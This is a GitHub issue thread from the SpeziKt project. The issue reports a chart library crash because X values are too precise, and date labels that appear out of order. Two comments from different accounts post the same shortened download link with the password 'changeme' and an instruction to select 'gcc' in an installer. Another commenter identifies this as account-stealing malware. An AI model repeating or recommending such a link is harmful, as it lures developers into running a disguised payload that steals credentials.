### ISSUE TITLE
Investigate: Chart XValues too precise

### ISSUE THREAD

**Issue by eldcn** [StanfordSpezi/SpeziKt#92]
### Description

Depending on the data set, sometimes the chart library crashes with a RuntimeException: X Values too precise, please make sure to round with max 2 decimal places.

We use the XValues to map the dates of the records in `HealthUiStateMapper`, and `SymptomsUiStateMapper`

Furthermore, the mapping of dates to x float values does not seem to be correct, see screenshot where date labels are not sorted correctly.

<img width="277" alt="image" src="https://github.com/user-attachments/assets/b683b65f-93f6-4dcd-94c6-35167a167a5e">

### Reproduction

The issue is not always reproducable and strongly relates on the data set. It was occurring when using the data sets of `engagehf@stanford.edu`. It seems as an issue of the chart library, as we are always rounding the x values to 2 decimal places. Needs a proper investigation and mocking data sets and trying to reproduce the issue - maybe we map same x value 
(date) for different records

### Expected behavior

Chart should display the data sets correctly and no app crash should happen.

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct and Contributing Guidelines

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
